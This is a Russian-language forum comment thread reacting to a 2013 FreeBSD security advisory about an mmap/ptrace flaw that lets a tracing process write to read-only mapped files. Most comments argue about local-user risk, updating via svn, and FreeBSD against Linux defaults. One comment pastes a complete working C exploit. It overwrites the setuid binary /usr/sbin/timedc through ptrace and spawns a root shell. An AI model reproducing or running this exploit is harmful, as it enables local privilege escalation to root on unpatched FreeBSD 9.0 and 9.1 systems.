|
|
|
4.14, 80е (?), 02:09, 19/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
>> если нету ip-kvm то это IMPOSSIBRU!
Если нету ip-kvm то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :) :) :)
| |
|
5.16, Аноним (-), 04:00, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
Ну да, а демоны у вас под какими пользователями работают? Сразу под рутом, чтобы хацкерам даже мучаться с дырками не надо было? :)
| |
|
6.20, 80е (?), 05:15, 19/06/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
Вы читаете то, что комментируете?
Я имею ввиду описание уязвимости.
| |
|
7.37, Аноним (-), 13:55, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> Я имею ввиду описание уязвимости.
Да, и там написано:
> Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного
> кода с пользовательскими привилегиями.
Для тех кто на бронепоезде (бсдшники, то-бишь), поясняю: локальный пользователь - только в том плане что это не ремотное поимение по сети, а "лишь" "локальным" кодом выполняемым на машине. А как именно залогинен пользователь, через KVM или там как демон какой-то - да пофигу скорее всего. А что, есть какая-то большая разница откуда трассировочные вызовы дергать? Очень сомнительно.
Хотя, если вам хочется публично лохануться, показав всему миру что вы дуб дубом и не понимаете что такое системные вызовы и как это работает - окей, nice try!
| |
|
|
9.56, Аноним (-), 15:34, 20/06/2013 [^] [^^] [^^^] [ответить] | +/– | Да, наверное рассаду у вас лучше будет получаться выращивать Самокритика засчит... текст свёрнут, показать | |
|
|
|
|
5.29, Andrey Mitrofanov (?), 10:28, 19/06/2013 [^] [^^] [^^^] [ответить]
| +2 +/– |
> Если нету ip-kvm
Ты пропустил:
"", нет запущенных сетевых сервисов, нет ключа от серверной, нет <...я.тоже.чего-то.пропустил...>
> то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :) :) :) | |
|
6.49, 80е (?), 06:34, 20/06/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?
| |
|
7.57, Аноним (-), 15:35, 20/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?
И чем он отличается в плане дергания сисколов от процессов "локального пользователя" к которому вы прикопались?
| |
|
|
|
|
|
2.4, IMHO (?), 00:07, 19/06/2013 [^] [^^] [^^^] [ответить]
| –2 +/– |
хорошо что ее нашли и исправили, а там уже как хочешь так и обновляйся или нет, уязвимость то локальная
| |
|
3.39, Аноним (-), 13:57, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> и обновляйся или нет, уязвимость то локальная
Ага, только это заканчивается тем что через вебню сначала хаксор просто вламывается и получает права пользователя. Потом апгрейдит их через что-то такое до рута. А потом ищи его свищи, когда там руткит половину сисколов переколбасил...
| |
|
2.50, друг iZEN (?), 09:33, 20/06/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ ДА И ТОЛЬКО
| |
|
3.51, Клыкастый (ok), 10:28, 20/06/2013 [^] [^^] [^^^] [ответить]
| +2 +/– |
Думать что тебя не атакуют каждый день - это раздолбайство. Атакуют. Каждый день.
| |
3.53, arisu (ok), 11:44, 20/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ
> ДА И ТОЛЬКО
если бы у тебя стояли хоть какие-то сервера на бсд и ты умел читать логи (я понимаю, что это два совершенно невероятных предположения), то ты узнал бы много интересного.
| |
3.58, Аноним (-), 15:36, 20/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!
Если бы у тебя был сервер вывешенный в интернет и ты умел читать логи, ты бы узнал очень много интересного на этот счет.
| |
|
|
1.2, IMHO (?), 00:06, 19/06/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
> Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до 9.1-RELEASE-p4 или 9.1-STABLE.
спасибо, так и сделаю
| |
|
|
3.15, 80е (?), 03:14, 19/06/2013 [^] [^^] [^^^] [ответить]
| –2 +/– |
И где взять?
../release/9.1.0/ и ../releng/9.1/
и там, и там — МУСОР.
Как это уже было при переносе портов с CVS на SVN.
Ща та же красота в BASE :)
В SVN — мусор, в CVS — ТОЖЕ МУСОР :)
Получить -p4 низзя :)
| |
|
|
5.34, 80е (?), 13:20, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
>> freebsd-update? не?
да, но это НЕ ПОПС.
Хотелось бы сдуть древо /usr/src
| |
|
4.26, тигар (ok), 10:01, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
releng/9.1
там не мусор, там код, если чо. и да, -p4. я проверил
r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) | 9 lines
Changed paths:
M /releng/9.1/UPDATING
M /releng/9.1/sys/conf/newvers.sh
M /releng/9.1/sys/vm/vm_map.c
Fix a bug that allowed a tracing process (e.g. gdb) to write
to a memory-mapped file in the traced process's address space
even if neither the traced process nor the tracing process had
write access to that file.
Security: CVE-2013-2171
Security: FreeBSD-SA-13:06.mmap
Approved by: so
p.s. а в base (head) запихали svn[lite] и вынесли cvs :)
| |
|
5.35, 80е (?), 13:27, 19/06/2013 [^] [^^] [^^^] [ответить]
| –3 +/– |
> releng/9.1
> там не мусор, там код, если чо. и да, -p4. я проверил
> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
> 9 lines
> Changed paths:
> M /releng/9.1/UPDATING
> M /releng/9.1/sys/conf/newvers.sh
> M /releng/9.1/sys/vm/vm_map.c
И вы знаете, — Я В КУРСЕ :) :) :)
Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src
А в SVN — именно МУ СОР
Ибо ни команда
svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
ни команда
svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src
набузыпив по мильену строк в /usr/src/.svn, — НЕ обновляют вот этих три
> M /releng/9.1/UPDATING
> M /releng/9.1/sys/conf/newvers.sh
> M /releng/9.1/sys/vm/vm_map.c | |
|
6.36, тигар (ok), 13:35, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
>> releng/9.1
>> там не мусор, там код, если чо. и да, -p4. я проверил
>> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
>> 9 lines
>> Changed paths:
>> M /releng/9.1/UPDATING
>> M /releng/9.1/sys/conf/newvers.sh
>> M /releng/9.1/sys/vm/vm_map.c
> И вы знаете, — Я В КУРСЕ :) :) :)
> Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src
ну, если вместо того, чтобы узнать о существовании update, ну и вообще научиться пользоваться vcs, тренировать пальцы набирая смайлики... то да, "мусор"
> А в SVN — именно МУ СОР
> Ибо ни команда
> svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
> ни команда
> svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src
особенно доставила вторая попытка "обновиться" до -p4 из release/9.1.0. что, на лыссяре нет хаутушек как работать с svn и это делает тебя грустной пандой ?
| |
|
|
|
|
|
1.18, Аноним (-), 04:04, 19/06/2013 [ответить] [﹢﹢﹢] [ · · · ]
| –7 +/– |
> Ошибка связана с отсутствием должных проверок доступа при трассировке
> приложений. В частности, процесс осуществляющий трассировку (например,
> отладчик) может получить права доступа к областям памяти трассируемого
> процесса, к которым у самого трассируемого процесса нет доступа
Феерично, чо. А у "лyноходов" даже в бyбунте обычной - тот кто не рут просто не может трейсить процессы, ибо постоянный источник проблем.
Вот как-то так и получается что ламерская бyбунта - секурнее пальцатой фрибзды. Чудеса, да? :)
| |
|
|
3.24, linux must __RIP__ (?), 08:26, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..
| |
|
4.27, Andrey Mitrofanov (?), 10:22, 19/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> нельзя же так срезать :) недавно как раз в linux была дыра
> которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через
> sysctl..
Нудк, теперь она есть и в твоей уютненькой.
| |
|
5.31, BayaN (ok), 11:42, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> Нудк, теперь она есть и в твоей уютненькой.
Портировали сволочи! И как всегда с опозданием.
| |
|
6.43, Аноним (-), 14:04, 19/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Портировали сволочи! И как всегда с опозданием.
Вопрос то не в портировании а в дефолтах. Вот ты при установке системы всегда прописываешь это? Нет? Тогда хренли толку с этого sysclt, если 90% обормотов которые пользуют BSD узнали о его существовании из этого поста? :)
| |
|
|
4.42, Аноним (-), 14:01, 19/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> нельзя же так срезать :) недавно как раз в linux была дыра
> которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..
Дядь, если ты не рут и пытаешься ptrace() - тебя просто сразу же и заворачивают. Совсем. Как это обойти то можно? :)
| |
|
3.41, Аноним (-), 14:00, 19/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> sysctl security.bsd.unprivileged_proc_debug=0 ы?
Только у бyбунтоидов и прочих это по дефолту. А у вас - думаете, нагуалы, тигары и прочие изены дотумкают это сделать без посторонней подсказки? Давайте поспорим что у них это не прописано и дырка эталонно работает, а? :)
| |
|
4.74, тигар (ok), 17:14, 21/06/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
на что спорить будем?
O.T. Мишенька, ты снова заболел, нельзя так, Шигорин.
| |
|
|
|
1.32, ALex_hha (ok), 12:08, 19/06/2013 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
> нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..
вообще то легко лечилась правкой sysctl ;)
# sysctl kernel.perf_event_paranoid=2
| |
|
|
|
|
|
6.47, Фтщтнь (?), 01:45, 20/06/2013 [^] [^^] [^^^] [ответить]
| +2 +/– |
>> на серверах.
> на всех четырёх!
На 24х... Ну лично у меня. А у вас я не знаю как там. Собственно тонко подвожу вас к тому, что понимание происходящего в объективной реальности ограничено исключительно вашими же представлениями о нем.
| |
|
7.52, arisu (ok), 11:03, 20/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
а я намекаю, что по сравнению с пингвинусом разница между четырьмя, двадцатью четырьмя, двухсот сорока четырьмя — неразличима.
| |
|
|
9.65, arisu (ok), 21:30, 20/06/2013 [^] [^^] [^^^] [ответить] | +1 +/– | да, виноват с местными грамотеями уже и 1038 скоро буду с тремя ошибками пис... текст свёрнут, показать | |
|
|
7.59, Аноним (-), 15:37, 20/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> На 24х... Ну лично у меня.
Думаете, ваши 24 сервака делают погоду на фоне миллионов? А большие конторы уже более-менее усвоили что жрать кактус смысла мало, при наличии более съедобных и удобных альтернатив.
| |
|
|
|
|
11.75, Led (ok), 21:01, 22/06/2013 [^] [^^] [^^^] [ответить] | +/– | А теперь на то, что ты не удержался , слетится миллионы мух Родители не учил... текст свёрнут, показать | |
|
|
|
|
|
|
|
|
|
4.62, whaddup (?), 17:00, 20/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
У кого-то мозги кривые. Обход этой настройки требовал исправления всего 1 байта в исходном коде сплойта.
| |
|
|
|
1.55, pavlinux (ok), 13:24, 20/06/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
*/
#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");
if (stat(av[0], &st) == -1)
err(2, "stat");
if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, "mmap");
if ((pid = fork()) == -1)
err(4, "fork");
if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");
return 0;
}
if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");
if (wait(&status) == -1)
err(7, "wait");
piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;
if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");
execl(TG, TG, NULL);
return 0;
}
| |
|
2.60, Аноним (-), 15:38, 20/06/2013 [^] [^^] [^^^] [ответить]
| +2 +/– |
> * Now you are 20 years old and your security is the same as 20 years ago... :)
Дожили, секурити фрибзды троллят даже в эксплойтах :)
| |
|
3.64, andrew0snake (?), 20:53, 20/06/2013 [^] [^^] [^^^] [ответить]
| –2 +/– |
>> * Now you are 20 years old and your security is the same as 20 years ago... :)
> Дожили, секурити фрибзды троллят даже в эксплойтах :)
На то ж они и тролли, чтоб троллить, а не находить эти уязвимости. И тем более не устранять)
| |
|
4.68, Аноним (-), 23:03, 20/06/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> На то ж они и тролли, чтоб троллить, а не находить эти
> уязвимости. И тем более не устранять)
Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию шеф-повара.
| |
|
5.71, тигар (ok), 00:11, 21/06/2013 [^] [^^] [^^^] [ответить]
| –2 +/– |
>> На то ж они и тролли, чтоб троллить, а не находить эти
>> уязвимости. И тем более не устранять)
> Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию
> шеф-повара.
привыкшим жрать исключительно говно^W^W^Wпользоваться только линаксом (убунту?) совсем не обязательно видеть что-то отличное от, чтобы орать "жрачка-дрянь!" да.
| |
|
|
|
2.72, тигар (ok), 00:14, 21/06/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
и да, псто откуда ты с3.14здил эксплоит (а чо свой копирайт не поставил-то?;)) от 19го, а закрыли дыру 18го.
| |
|
1.76, StainlessRat (??), 21:25, 25/06/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Всегда говорил: FreeBSD - Серверная платформа. Мастдай, и прочая хня - от лУКАВОГО. А локальная уязвимость... Так нех... пускать на сервер юзверей :)
| |
|
2.77, Andrey Mitrofanov (?), 21:50, 25/06/2013 [^] [^^] [^^^] [ответить]
| +/– |
> Всегда говорил: FreeBSD
>Так нех... пускать на сервер юзверей :)
И IP соединеия снаружи. И соединеия *наружу*. И электричество из _сети_. </fbsd security>
| |
|
|